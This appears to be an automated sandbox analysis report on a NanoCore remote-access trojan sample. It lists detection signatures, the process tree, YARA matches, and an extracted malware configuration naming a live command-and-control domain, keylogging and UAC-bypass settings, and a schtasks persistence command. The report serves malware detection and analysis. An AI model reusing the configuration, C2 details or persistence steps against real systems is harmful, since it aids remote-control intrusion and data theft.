Analysis Report qnJXJsqt1M.exe

Overview

General Information

Sample Name: qnJXJsqt1M.exe
Analysis ID: 383820
MD5: e98ce8a425d942e7337ecbd309707e25
SHA1: 39e794cff61991cbcc073db38bfbf1e496953106
SHA256: 34d2073606f34324e1ba7146defa9f69e387059b64d1bfb28a5c9f37b0fc9436
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • qnJXJsqt1M.exe (PID: 2764 cmdline: 'C:\Users\user\Desktop\qnJXJsqt1M.exe' MD5: E98CE8A425D942E7337ECBD309707E25)
    • MSBuild.exe (PID: 4156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
      • schtasks.exe (PID: 2164 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • MSBuild.exe (PID: 3544 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)
    • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • znytpstdcrwsisx.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe' MD5: 206B9BA9B804BD72DB71AEBAB5967567)
    • MSBuild.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "2ad4e32f-c687-4329-b5e5-302ef0e0", "Group": "Default", "Domain1": "nickdns22.duckdns.org", "Domain2": "127.0.0.1", "Port": 1896, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    
<Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url | Methodology_Suspicious_Shortcut_Local_URL | Detects local script usage for .URL persistence | @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x14:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]
dropped/znytpstdcrwsisx.fr.url | Methodology_Suspicious_Shortcut_Local_URL | Detects local script usage for .URL persistence | @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x14:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x770d5:$x1: NanoCore.ClientPluginHost
  • 0x77112:$x2: IClientNetworkHost
  • 0x7ac45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
    00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0x76e3d:$a: NanoCore
    • 0x76e4d:$a: NanoCore
    • 0x77081:$a: NanoCore
    • 0x77095:$a: NanoCore
    • 0x770d5:$a: NanoCore
    • 0x76e9c:$b: ClientPlugin
    • 0x7709e:$b: ClientPlugin
    • 0x770de:$b: ClientPlugin
    • 0x76fc3:$c: ProjectData
    • 0x779ca:$d: DESCrypto
    • 0x7f396:$e: KeepAlive
    • 0x7d384:$g: LogClientMessage
    • 0x7957f:$i: get_Connected
    • 0x77d00:$j: #=q
    • 0x77d30:$j: #=q
    • 0x77d4c:$j: #=q
    • 0x77d7c:$j: #=q
    • 0x77d98:$j: #=q
    • 0x77db4:$j: #=q
    • 0x77de4:$j: #=q
    • 0x77e00:$j: #=q
    0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0xf5ed:$x1: NanoCore.ClientPluginHost
    • 0xf62a:$x2: IClientNetworkHost
    • 0x1315d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
        11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        12.2.MSBuild.exe.400000.0.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

        Sigma Overview

        System Summary:

        Sigma detected: Drops script at startup location
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\Desktop\qnJXJsqt1M.exe, ProcessId: 2764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url
        Sigma detected: NanoCore
        Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 4156, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Sigma detected: Scheduled temp file as task from temp location
        Source: Process started, Author: Joe Security, Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentProcessId: 4156, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp', ProcessId: 2164

        Signature Overview

        AV Detection:

        Antivirus / Scanner detection for submitted sample
        Source: qnJXJsqt1M.exe, Avira: detected
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe, Avira: detection malicious, Label: DR/AutoIt.Gen8
        Found malware configuration
        Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore (same configuration as listed under Malware Configuration above)
        Multi AV Scanner detection for domain / URL
        Source: nickdns22.duckdns.org, Virustotal: Detection: 7%
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe, Virustotal: Detection: 55%
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe, ReversingLabs: Detection: 47%
        Multi AV Scanner detection for submitted file
        Source: qnJXJsqt1M.exe, Virustotal: Detection: 67%
        Source: qnJXJsqt1M.exe, Metadefender: Detection: 37%
        Source: qnJXJsqt1M.exe, ReversingLabs: Detection: 79%
        Yara detected Nanocore RAT
        Source: 1.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.2.znytpstdcrwsisx.exe.d50000.0.unpack, Avira: Label: DR/AutoIt.Gen8
        Source: 12.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 11.0.znytpstdcrwsisx.exe.d50000.0.unpack, Avira: Label: DR/AutoIt.Gen8
        Source: 0.2.qnJXJsqt1M.exe.ad0000.0.unpack, Avira: Label: DR/AutoIt.Gen8
        Source: 0.0.qnJXJsqt1M.exe.ad0000.0.unpack, Avira: Label: DR/AutoIt.Gen8
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, Avira: Label: TR/NanoCore.fadte
        Source: qnJXJsqt1M.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: Binary string: indows\MSBuild.pdbpdbild.pdbs source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\MSBuild.pdbl source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000001.00000002.507151725.00000000059F0000.00000002.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B16CA9 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B21B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B1EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B1F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe, Code function: 0_2_00B1F56F FindFirstFileW,FindClose,
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe, Code function: 11_2_00D96CA9 GetFileAttributesW,FindFirstFileW,FindClose,

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: nickdns22.duckdns.org
        Source: Malware configuration extractor, URLs: 127.0.0.1
        Uses dynamic DNS services
        Source: unknown, DNS query: name: nickdns22.duckdns.org
        Source: Joe Sandbox View, ASN Name: WOWUS WOWUS
        Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.159.137
        Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.160.3
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B24EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
        Source: unknownDNS traffic detected: queries for: nickdns22.duckdns.org
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49678
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B26B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B12B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
        Source: MSBuild.exe, 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B3F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY
        Source: Yara match File source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY
        Source: Yara match File source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY
        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        AutoIt script contains suspicious strings
        Source: qnJXJsqt1M.exe AutoIt Script: T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4g
        Source: qnJXJsqt1M.exe AutoIt Script: EN $S32383033JPB = DLLCALLADDRESS ($C31333233O8ISGY ,
        Source: znytpstdcrwsisx.exe.0.dr AutoIt Script: T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4g
        Source: znytpstdcrwsisx.exe.0.dr AutoIt Script: EN $S32383033JPB = DLLCALLADDRESS ($C31333233O8ISGY ,
        Binary is likely a compiled AutoIt script file
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: This is a third-party compiled AutoIt script.
        Source: qnJXJsqt1M.exe String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: qnJXJsqt1M.exe, 00000000.00000000.229366699.0000000000B7E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: znytpstdcrwsisx.exe String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: znytpstdcrwsisx.exe, 0000000B.00000000.259387793.0000000000DFE000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: qnJXJsqt1M.exe String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 1_2_054214FA NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 1_2_054214BF NtQuerySystemInformation,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B16685: CreateFileW,DeviceIoControl,CloseHandle,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B0ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057423A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_05742FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_0574306F
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: String function: 00AEEC2F appears 63 times
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: String function: 00AF6AC0 appears 32 times
        Source: qnJXJsqt1M.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: qnJXJsqt1M.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
